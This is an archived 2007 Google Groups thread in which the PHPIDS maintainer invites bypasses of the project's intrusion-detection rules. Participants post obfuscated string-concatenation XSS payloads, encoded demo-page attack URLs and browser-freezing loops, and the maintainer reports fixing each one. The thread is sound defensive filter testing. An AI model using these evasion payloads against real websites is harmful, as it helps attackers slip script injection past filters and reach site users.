Gmail Calendar Documents Reader Web more »
Recently Visited Groups | Help | Sign in
Google Groups Home
Pleeeease hack us!
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
  Messages 1 - 25 of 214 - Collapse all  -  Translate all to Translated (View all originals)   Newer >
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
 
From:
To:
Cc:
Followup To:
Add Cc | Add Followup-to | Edit Subject
Subject:
Validation:
For verification purposes please type the characters you see in the picture below or the numbers you hear by clicking the accessibility icon. Listen and type the numbers you hear
 
Mario Heiderich  
View profile  
 More options Aug 28 2007, 3:40 pm
From: Mario Heiderich <Mario.Heider...@googlemail.com>
Date: Tue, 28 Aug 2007 12:40:43 -0700
Local: Tues, Aug 28 2007 3:40 pm
Subject: Pleeeease hack us!
Hi!

After talking to Christian and SirDarckCat I decided to make this post
- even if it may sound a little bit provocative ;) We spend lots of
time with the rules and except from some details we are pretty content
with them.

So if you like and find some time give them a new try - anyone who
will manage to create an XSS on the demo page will be mentioned in the
next release notes and will (if wanted) get a dedicated interview on
the blog (SirDarckCat's  interview will appear the next days - he was
again quicker than light with some vectors mentioned in the release
post).

Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+

Any vector which will be able to create an alert/content change via JS
on the demo page counts - as long as a PoC of what form ever can be
provided. A similar contest will follow the next weeks for SQL
Injection.

Greetings and have fun!
.mario


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Giorgio Maone  
View profile  
 More options Sep 4 2007, 11:02 am
From: Giorgio Maone <giorgio.ma...@gmail.com>
Date: Tue, 04 Sep 2007 15:02:01 -0000
Local: Tues, Sep 4 2007 11:02 am
Subject: Re: Pleeeease hack us!
    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile  
 More options Sep 4 2007, 11:10 am
From: "Mario Heiderich" <mario.heider...@googlemail.com>
Date: Tue, 4 Sep 2007 17:10:02 +0200
Local: Tues, Sep 4 2007 11:10 am
Subject: Re: Pleeeease hack us!

Thanks Giorgio! Very classy ones again. *fixing*

2007/9/4, Giorgio Maone <giorgio.ma...@gmail.com>:

--
_______________________
php-ids.org

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
MaierMan@web.de  
View profile  
 More options Sep 5 2007, 3:16 pm
From: "Maier...@web.de" <Maier...@web.de>
Date: Wed, 05 Sep 2007 12:16:18 -0700
Local: Wed, Sep 5 2007 3:16 pm
Subject: Re: Pleeeease hack us!
Make Giorgios threesome a foursome.
obj[name]() works as well, giving access to all top level functions/
objects.
Low impact in general, but this might be combined with other things...

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile  
 More options Sep 5 2007, 3:33 pm
From: "Mario Heiderich" <mario.heider...@googlemail.com>
Date: Wed, 5 Sep 2007 21:33:55 +0200
Local: Wed, Sep 5 2007 3:33 pm
Subject: Re: Pleeeease hack us!

Hi MalerMan and welcome to the group!
Nice variation - I shouldn't have forgotten that ;) *fixed*

Sorry for being late with answers today - I caught a cold and had to dig
myself to a project although...

Greetings,
.mario

2007/9/5, Maier...@web.de <Maier...@web.de>:

> Make Giorgios threesome a foursome.
> obj[name]() works as well, giving access to all top level functions/
> objects.
> Low impact in general, but this might be combined with other things...

--
_______________________
php-ids.org

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile  
 More options Sep 6 2007, 5:03 am
From: Gareth <gazhe...@gmail.com>
Date: Thu, 06 Sep 2007 09:03:44 -0000
Local: Thurs, Sep 6 2007 5:03 am
Subject: Re: Pleeeease hack us!
s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+'';s4=''==''?':':
0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8

Told you string concatenation was tough :)

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile  
 More options Sep 6 2007, 6:55 am
From: Gareth <gazhe...@gmail.com>
Date: Thu, 06 Sep 2007 10:55:43 -0000
Local: Thurs, Sep 6 2007 6:55 am
Subject: Re: Pleeeease hack us!
This will also work with the window.name trick (on IE only onclick):-

URL=name

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile  
 More options Sep 6 2007, 10:48 am
From: Gareth <gazhe...@gmail.com>
Date: Thu, 06 Sep 2007 14:48:16 -0000
Local: Thurs, Sep 6 2007 10:48 am
Subject: Re: Pleeeease hack us!
Now this is a strange one:-
h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+ 'pt'+'';s4=''==''?':':
0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;

It should work cause I tested it locally however it doesn't seem to
execute on your site. I've no idea why, maybe some characters are
cause the onclick handler to produce invalid data. The code above get
pass your filters though,

Tested this is Firefox locally and it worked:-
<a
onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+ '';s3=''+'pt'+'';s4=''==''?':':
0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;"
href="?test=test">Test</a>

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile  
 More options Sep 7 2007, 11:54 am
From: "Mario Heiderich" <mario.heider...@googlemail.com>
Date: Fri, 7 Sep 2007 17:54:39 +0200
Local: Fri, Sep 7 2007 11:54 am
Subject: Re: Pleeeease hack us!

Yep - very nice and strange one indeed! But fixed. The concatenation
algorithm has received a recode - hope that will stop the next wave ;)

Greetings and thanks!
.mario

2007/9/6, Gareth <gazhe...@gmail.com>:

--
_______________________
php-ids.org

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile  
 More options Sep 7 2007, 12:30 pm
From: Gareth <gazhe...@gmail.com>
Date: Fri, 07 Sep 2007 09:30:39 -0700
Local: Fri, Sep 7 2007 12:30 pm
Subject: Re: Pleeeease hack us!
Cool Mario nice one, I'll look forward to hacking it again :)

I think I might have found 1 vector already

On Sep 7, 4:54 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile  
 More options Sep 8 2007, 6:20 am
From: Gareth <gazhe...@gmail.com>
Date: Sat, 08 Sep 2007 03:20:48 -0700
Local: Sat, Sep 8 2007 6:20 am
Subject: Re: Pleeeease hack us!
s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2 ;URL=s1

On Sep 7, 5:30 pm, Gareth <gazhe...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile  
 More options Sep 8 2007, 9:58 am
From: Mario Heiderich <Mario.Heider...@googlemail.com>
Date: Sat, 08 Sep 2007 13:58:02 -0000
Local: Sat, Sep 8 2007 9:58 am
Subject: Re: Pleeeease hack us!
very cool and.. *fixed*

I sent you the questions, gareth. next would be kishor and giorgio if
you guys like to.

On Sep 8, 12:20 pm, Gareth <gazhe...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile  
 More options Sep 8 2007, 2:43 pm
From: Gareth <gazhe...@gmail.com>
Date: Sat, 08 Sep 2007 11:43:37 -0700
Local: Sat, Sep 8 2007 2:43 pm
Subject: Re: Pleeeease hack us!
x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/
+'';j=s[1]+s[2]+s[3]+s[4]+s[5]+s[6]+s[7]+s[8]+s[9]+s[10]+c
+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26]; x[h]=j

On Sep 8, 2:58 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile  
 More options Sep 9 2007, 2:30 pm
From: Gareth <gazhe...@gmail.com>
Date: Sun, 09 Sep 2007 11:30:36 -0700
Local: Sun, Sep 9 2007 2:30 pm
Subject: Re: Pleeeease hack us!
c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';c1=1==1&&'javascript';a=c1+c2+c 3+'t'+c4;
(URL=a);

On Sep 8, 7:43 pm, Gareth <gazhe...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
thornmaker  
View profile  
 More options Sep 9 2007, 4:06 pm
From: thornmaker <thornma...@gmail.com>
Date: Sun, 09 Sep 2007 20:06:14 -0000
Local: Sun, Sep 9 2007 4:06 pm
Subject: Re: Pleeeease hack us!
    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
thornmaker  
View profile  
 More options Sep 10 2007, 1:19 am
From: thornmaker <thornma...@gmail.com>
Date: Mon, 10 Sep 2007 05:19:22 -0000
Local: Mon, Sep 10 2007 1:19 am
Subject: Re: Pleeeease hack us!
here's another one using the "exec" function for regular expressions
to extract the strings to execute:
http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...

On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile  
 More options Sep 10 2007, 4:16 am
From: "Mario Heiderich" <mario.heider...@googlemail.com>
Date: Mon, 10 Sep 2007 10:16:17 +0200
Local: Mon, Sep 10 2007 4:16 am
Subject: Re: Pleeeease hack us!

Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
being in the right format to  be executed.

2007/9/10, thornmaker <thornma...@gmail.com>:

> here's another one using the "exec" function for regular expressions
> to extract the strings to execute:

> http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...

> On Sep 9, 4:06 pm, thornmaker <thornma...@gmail.com> wrote:
> > http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%30%3A%27%65%76%27...

--
_______________________
php-ids.org

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile  
 More options Sep 10 2007, 4:40 am
From: Gareth <gazhe...@gmail.com>
Date: Mon, 10 Sep 2007 01:40:26 -0700
Local: Mon, Sep 10 2007 4:40 am
Subject: Re: Pleeeease hack us!
Hi All

I've written a simple script to conduct concatenation attacks, so if
anyone wants to improve it or add new vectors please do and send them
to the group.
The reason I think it is need is because of the amount of possible
combinations and having a automated tool like this would help with
unit testing of the code. You never know when a vector could creep
back in you see.

Tool available here:-
www.businessinfo.co.uk/labs/phpids/phpids.php.zip

On Sep 10, 9:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile  
 More options Sep 10 2007, 7:15 am
From: Gareth <gazhe...@gmail.com>
Date: Mon, 10 Sep 2007 11:15:51 -0000
Local: Mon, Sep 10 2007 7:15 am
Subject: Re: Pleeeease hack us!
Another thing I've thought about is Javascript based XSS protection, I
don't know if this is outside the projects goal but something like
this would prevent window.name exploits:-

<script type="text/javascript">window.name=''</script>

Which the PHPIDS could include in the header of the page.

On Sep 10, 9:40 am, Gareth <gazhe...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile  
 More options Sep 10 2007, 7:24 am
From: "Mario Heiderich" <mario.heider...@googlemail.com>
Date: Mon, 10 Sep 2007 13:24:54 +0200
Local: Mon, Sep 10 2007 7:24 am
Subject: Re: Pleeeease hack us!

It's a good idea but it's way outside the project - the IDS will provide no
protection - just monitoring and information on possible attacks. I had the
PHPIPS idea in my head too for some time but there are so many other tools
and ways to solve that...

2007/9/10, Gareth <gazhe...@gmail.com>:

--
_______________________
php-ids.org

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
thornmaker  
View profile  
 More options Sep 10 2007, 9:45 am
From: thornmaker <thornma...@gmail.com>
Date: Mon, 10 Sep 2007 13:45:43 -0000
Local: Mon, Sep 10 2007 9:45 am
Subject: Re: Pleeeease hack us!
so here's a similar one but elimates the reg exp's... just pulls the
chars from the ''+/asdf/ directly.
http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67...

Mario: do you prefer these posted here or at sla.ckers or both?

On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile  
 More options Sep 10 2007, 10:03 am
From: "Mario Heiderich" <mario.heider...@googlemail.com>
Date: Mon, 10 Sep 2007 16:03:32 +0200
Local: Mon, Sep 10 2007 10:03 am
Subject: Re: Pleeeease hack us!

Wow - I am impressed again ;) I'd prefer both variants of publishing if you
don't mind. Great work, thornmaker!

Greetings,
.mario

2007/9/10, thornmaker <thornma...@gmail.com>:

--
_______________________
php-ids.org

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
xorrer  
View profile  
 More options Sep 10 2007, 5:49 pm
From: xorrer <obhvsbypqg...@gmail.com>
Date: Mon, 10 Sep 2007 14:49:47 -0700
Local: Mon, Sep 10 2007 5:49 pm
Subject: Re: Pleeeease hack us!
A few of my findings.

A redirect to google.

http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...

If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
the site opens and immediatly closes (close()).

The following two lock up the browser with 100% CPU activity.

http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...
http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D

This is a opera specific thing which you could use to spam up the
"error console" using an endless loop. opera.postError(1);

On 10 Sep., 16:03, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile  
 More options Sep 10 2007, 6:10 pm
From: Mario Heiderich <Mario.Heider...@googlemail.com>
Date: Mon, 10 Sep 2007 22:10:52 -0000
Local: Mon, Sep 10 2007 6:10 pm
Subject: Re: Pleeeease hack us!
Hi xorrer and welcome!

Nice stuff - I didn't know about the opera specific JS - is there a
link to inform about that stuff?

Needless to say that the rules are *fixed*  ;)

Thanks man!
.mario

On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
thornmaker  
View profile  
 More options Sep 10 2007, 10:23 pm
From: thornmaker <thornma...@gmail.com>
Date: Tue, 11 Sep 2007 02:23:24 -0000
Local: Mon, Sep 10 2007 10:23 pm
Subject: Re: Pleeeease hack us!

http://demo.php-ids.org/?test=%61%3D%31%21%3D%31%3F%2F%78%2F%3A%27%65...

On Aug 28, 3:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Messages 1 - 25 of 214   Newer >
« Back to Discussions « Newer topic     Older topic »

Create a group - Google Groups - Google Home - Terms of Service - Privacy Policy
©2009 Google